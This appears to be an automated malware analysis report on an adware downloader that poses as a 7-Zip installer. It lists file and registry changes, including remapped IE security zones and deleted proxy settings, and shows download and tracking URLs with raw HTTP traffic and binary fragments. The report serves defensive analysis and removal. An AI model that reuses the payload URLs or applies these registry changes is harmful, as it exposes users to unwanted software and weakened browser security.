not-a-virus:AdWare.Win32.AdLoad.cbys (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 7ed96b6b6716f335a2a846ae95c66e6d
SHA1: 1f3107af9690e39f82099b7aa7fb66888dfb0eb1
SHA256: e22a92221a93094ad747337b5f817c8d1d4b5760bd5decc9538a7ce1207e765c
SSDeep: 49152:B1nULKB0btfWI7RsNa4gYAOZc4jlHKwF2t IK2/TaLBp4EU:BdtqsI7RsNa4sOZc4jlHKwk/U/U
Size: 2185519 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-06-09 16:19:49
Analyzed on: WindowsXP SP3 32-bit
Summary: Adware. Delivers advertising content in a manner or context that may be unexpected and unwanted by users. Many adware applications also perform tracking functions. Users may want to remove adware if they object to such tracking, do not wish to see the advertising caused by the program or are frustrated by its effects on system performance.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The not-a-virus creates the following process(es):
run-setup.exe:1336
%original file name%.exe:2016
SevenZip_Setup.exe:928
The not-a-virus injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process run-setup.exe:1336 makes changes in the file system.
The not-a-virus creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (671 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SevenZip_Setup.exe (40528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
The not-a-virus deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu1.tmp (0 bytes)
The process %original file name%.exe:2016 makes changes in the file system.
The not-a-virus creates and/or writes to the following file(s):
The not-a-virus deletes the following file(s):
The process SevenZip_Setup.exe:928 makes changes in the file system.
The not-a-virus creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\timestamp[1].htm (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@secure.oi-installer5[1].txt (225 bytes)
Registry activity
The process run-setup.exe:1336 makes changes in the system registry.
The not-a-virus creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 4F 43 35 D5 76 4E FB 22 20 1F 38 84 F0 7E FE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:2016 makes changes in the system registry.
The not-a-virus creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 AF DB 99 FF 47 22 4A 03 B7 FD 4A B3 0E B7 BD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"run-setup.exe" = "run-setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The not-a-virus modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The not-a-virus modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The not-a-virus modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process SevenZip_Setup.exe:928 makes changes in the system registry.
The not-a-virus creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 26 87 27 30 D3 56 64 D0 78 42 19 EC 73 DE 63"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The not-a-virus modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The not-a-virus modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The not-a-virus modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The not-a-virus deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| b9794225748afb2525ffac7bbbc7a387 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SevenZip_Setup.exe |
| a5f8399a743ab7f9c88c645c35b1ebb5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\NSISdl.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
run-setup.exe:1336
%original file name%.exe:2016
SevenZip_Setup.exe:928 - Delete the original not-a-virus file.
- Delete or disinfect the following files created/modified by the not-a-virus:
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (671 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SevenZip_Setup.exe (40528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\timestamp[1].htm (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@secure.oi-installer5[1].txt (225 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 74526 | 74752 | 4.54396 | a8692f5ba740240ef0f9a827376f76f9 |
| .rdata | 81920 | 7445 | 7680 | 3.46159 | d4f36accffde0bf520f52486679ccf0d |
| .data | 90112 | 96036 | 512 | 2.46008 | b6c7edb5b7fec47a37a622cc5d71f3f4 |
| .CRT | 188416 | 32 | 512 | 0.273198 | 439411041ee0b8261668525c5c132cd9 |
| .rsrc | 192512 | 16656 | 16896 | 3.23905 | aa3a7d7ff24a928d00c7a73daacad998 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 439
01d8f21bdcf3f33cfd44b21cda45bbe1
080d7e74c49edc85c7f6ccf3d8616611
aaf4423dd074b8106e305632e6d64be2
65e4280f1ded384038fd30f88508d4e0
8a1b30a4c3845736d382278d30db1f66
3a154551bb5e5badfa1407a16c1444e9
9cbc3bd4f3109115c31cb030a37fc779
b35b2a682bd0b6418f0833a4a146fc3a
6743bd9e045b6ac6552dc0988afb1040
6a1633a9f055b93be88515fc88471c3c
bcb62e2c0201537a919a023fd8bd0c76
15d26afe16056a0c1e451902f8031d80
871e7d52b5615add0aaee0566123ee42
eb108dd5a482222f471803126004c75d
62b772f959ee84a244a1ebca4734a15c
8f16619a1e9f5140e494bf8047ccef14
23865ff029e65fae0db1f73c2df34b85
c0337f81961e826cdca238240015f9b0
abfce0d030f822bd164fcd00d6a59027
7a4fb066dec36bc6b6d9c138c197daf3
ca1f33580de7375b728d44371a497764
cd62699f7fd3baec87754c4004f891f9
3493e993a11d908fdd1143035cc9ab35
7c094695a717c8550be437979bd412bb
fdce746cd7ec071713f57ed7918b2a54
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://54.235.251.129/o/wakenet_sevenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet& | |
| hxxp://54.235.251.129/validate/timestamp?ts=1418564576&sig=98F23C1CCEF11AAA52BBAB0B9031E99E | |
| hxxp://imp.oi-imp4.com/impression.do/?event=dl_d&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1&page=6&referrer=844 | 54.243.212.97 |
| hxxp://imp.oi-imp4.com/impression.do/?event=loader_start&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1 | 54.243.212.97 |
| hxxp://54.235.251.129/o/wakenet_sevenzip/SevenZip_Setup.exe?mode=dlshiftcombined&subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&&callback&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&browser=--&useragent=NSISDL/1.2 (Mozilla) | |
| hxxp://imp.oi-imp4.com/impression.do/?event=dl_d&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1&page=1013760&referrer=5266 | 54.243.212.97 |
| hxxp://secure.oi-installer5.com/o/wakenet_sevenzip/SevenZip_Setup.exe?mode=dlshiftcombined&subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&&callback&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&browser=--&useragent=NSISDL/1.2 (Mozilla) | |
| hxxp://secure.oi-installer5.com/o/wakenet_sevenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet& | |
| hxxp://secure.oi-installer5.com/validate/timestamp?ts=1418564576&sig=98F23C1CCEF11AAA52BBAB0B9031E99E |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /o/wakenet_sevenzip/SevenZip_Setup.exe?mode=dlshiftcombined&subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&&callback&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&browser=--&useragent=NSISDL/1.2 (Mozilla) HTTP/1.1
User-Agent: d
Host: secure.oi-installer5.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 1013760
Content-Type: application/octet-stream
Expires: -1
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SevenZip_Setup.exe
Access-Control-Allow-Origin: *
Set-Cookie: wakenet=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910; expires=Mon, 15-Dec-2014 12:43:00 GMT; path=/
Date: Sun, 14 Dec 2014 12:43:00 GMT
Connection: close
..x....ABAAAEAAA..AA.AAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAO^.OA.H.`.@..`.)(2a13.&3 ,a" //.5a#$a34/a(/a...a,.%$oLLKeAAAAAAAb).t&H.'&H.'&H.'/0]'*H.'..H''H.'8.K'9H.'8.]'.H.'&H.'.J.'/0M'.H.'8.Z'.H.'8.J''H.'8.O''H.'.(")&H.'AAAAAAAA..AA.@DAu-..AAAAAAAA.AC@J@HAAiHAA.GAAAAA..GAAQAAA.HAAA.AAQAAACAADAAAAAAADAAAAAAAAAQAAEAA.rQACA..AAQAAQAAAAQAAQAAAAAAQAAAAAAAAAAA..JA.@AAA!MAQ.CAAAAAAAAAAAAAAAAAAANA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAI.KA.AAAAAAAAAAAA.HA.FAAE.JA.AAAAAAAAAAAAAAAAAAAo5$95AAAhgHAAQAAAiHAAEAAAAAAAAAAAAAAaAA!o3% 5 AAY.CAA.HAA.CAAmHAAAAAAAAAAAAA.AA.o% 5 AAA..AAA.JAAyAAA.JAAAAAAAAAAAAA.AA.o323"AAAQ.CAA!MAA.CAA.JAAAAAAAAAAAAA.AA.o3$-."AA%.AAAANAA.AAA.OAAAAAAAAAAAAA.AA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..M....N.Q...>K.@.Q.....E..@...A...GA....G...A...GA..eI@5F....EA.....EA....4U.4Q.4M.4I...GA..I..Q......4U.4Q.4M.4I...GA..I..Q.......Q........qIA....I...........EA.........A4e A.....qIA..A4L.D...A....A.G.....qIA.G.......... A.....qIA..E...2E...E.....qIA........... A.....qIA..E..7H...2E...E.6E..Z......b...qIA.......@...A......sIA.G.bpIA.............eE....I.O.-.......EA.H..5P.......5I.Q @...S..H..5eIz0M2I..I.E..Cr...4Xy.U5U..qIAz1M2I..I.E..Cr...EA.@.r........Q.........I........I..........EA.....0e..I.$.
<<< skipped >>>
GET /o/wakenet_sevenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet& HTTP/1.0
Host: secure.oi-installer5.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 437104
Content-Type: application/octet-stream
Expires: -1
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SevenZip_Setup.exe
Access-Control-Allow-Origin: *
Set-Cookie: wakenet=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910; expires=Mon, 15-Dec-2014 12:42:56 GMT; path=/
Date: Sun, 14 Dec 2014 12:42:56 GMT
Connection: close
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......).R.m.<.m.<.m.<.s...{.<.s.....<.d...j.<.m.=...<.s.....<.s...l.<.s...l.<.Richm.<.........PE..L....{.T.............................]............@.................................4.......................................D?..P........K..............p...........................................P...@............................................text............................... ..`.rdata..............................@..@.data...@9...P.......0..............@....rsrc....K.......L...J..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................U..j.h.|B.d.....P........UC.3..E.P.E.d.......d.......hx.B..M..n....E.....h..B..M..Z....E...E......}..u..E..E....M..M..E..h,.B..M..*....E...E......E......E......E........U.....U..M..g8..9E.......j..E.P..h...Q.M........`.....`.....\....E....\...P.M..T....E....h....%.....M...u?h0.B..U.R..$..........u.h4.B..M.Q..$..........t..E...E..E..V....}..~..M. M..M../h8.B..U.R..$..........t..M.....M....E...........U.;...B.tQ.E. E.P.M.Q.U.R.M........d........d....E...M..a....E...M..U....E..
<<< skipped >>>
GET /impression.do/?event=dl_d&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1&page=6&referrer=844 HTTP/1.1
User-Agent: download manager
Host: imp.oi-imp4.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: image/png
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 14 Dec 2014 12:43:00 GMT
Connection: close
Content-Length: 109
.PNG........IHDR..............wS.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?@....... .t.....IEND.B`...
GET /validate/timestamp?ts=1418564576&sig=98F23C1CCEF11AAA52BBAB0B9031E99E HTTP/1.1
User-Agent: d
Host: secure.oi-installer5.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Date: Sun, 14 Dec 2014 12:42:59 GMT
Connection: close
Content-Length: 6
200 OK..
GET /impression.do/?event=dl_d&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1&page=1013760&referrer=5266 HTTP/1.1
User-Agent: download manager
Host: imp.oi-imp4.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: image/png
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 14 Dec 2014 12:43:05 GMT
Connection: close
Content-Length: 109
.PNG........IHDR..............wS.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?@....... .t.....IEND.B`...
GET /impression.do/?event=loader_start&implementation_id=min.0.0.19&user_id=d98f2e19-90cb-4a42-bdce-f4e1a1ecf910&adprovider=wakenet&source=wakenet_sevenzip-1 HTTP/1.1
User-Agent: download manager
Host: imp.oi-imp4.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: image/png
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 14 Dec 2014 12:43:00 GMT
Connection: close
Content-Length: 109
.PNG........IHDR..............wS.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?@....... .t.....IEND.B`...
Map
The not-a-virus connects to the servers at the folowing location(s):
Strings from Dumps
run-setup.exe_1336:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\SevenZip_Setup.exe"
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\SevenZip_Setup.exe"
ip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
ip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
.reloc
.reloc
WS2_32.dll
WS2_32.dll
NSISdl.dll
NSISdl.dll
invalid URL
invalid URL
Host: %s
Host: %s
GET %s HTTP/1.0
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
User-Agent: NSISDL/1.2 (Mozilla)
http=
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u hours remaining)
(%u minutes remaining)
(%u minutes remaining)
(%u seconds remaining)
(%u seconds remaining)
Downloading %s
Downloading %s
.vN {
.vN {
({,{
({,{
.OQv]y
.OQv]y
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
SevenZip_Setup.exe
SevenZip_Setup.exe
SEVENZ~1.EXE
SEVENZ~1.EXE
SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\ii_start.txt
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\ii_start.txt
evenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
evenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
ip_Setup.exe
ip_Setup.exe
taller5.com/o/wakenet_sevenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
taller5.com/o/wakenet_sevenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
"D:\run-setup.exe"
"D:\run-setup.exe"
run-setup.exe
run-setup.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
D:\run-setup.exe
D:\run-setup.exe
hXXp://secure.oi-installer5.com/o/wakenet_sevenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
hXXp://secure.oi-installer5.com/o/wakenet_sevenzip/SevenZip_Setup.exe?subid=wakenet_sevenzip-1&filedescription=SevenZip-Setup&adprovider=wakenet&
Nullsoft Install System v2.46
Nullsoft Install System v2.46
SevenZip_Setup.exe_928:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
InternetOpenUrlA
InternetOpenUrlA
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
WININET.dll
WININET.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
zcÃ
zcÃ
Program: C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\SevenZip_Setup.exe
Program: C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\SevenZip_Setup.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\SevenZip_Setup.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\SevenZip_Setup.exe
77:,,.99;::
77:,,.99;::
334//1;;=88:557
334//1;;=88:557
__`**,99;=((*
__`**,99;=((*
..0556;;=002
..0556;;=002
** 76754453252152/51-71-1,)::
** 76754453252152/51-71-1,)::
)) 88:557668--/
)) 88:557668--/
##ˆ:55788:&&(
##ˆ:55788:&&(
--.77999:'')
--.77999:'')
)),99:;;=--/
)),99:;;=--/
...yxxx
...yxxx
.lG!V
.lG!V
=U.bc=
=U.bc=
.ECCC
.ECCC
;w.mmm
;w.mmm
VVV.inkscape.org
VVV.inkscape.org
43.jdbX
43.jdbX
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
true
true
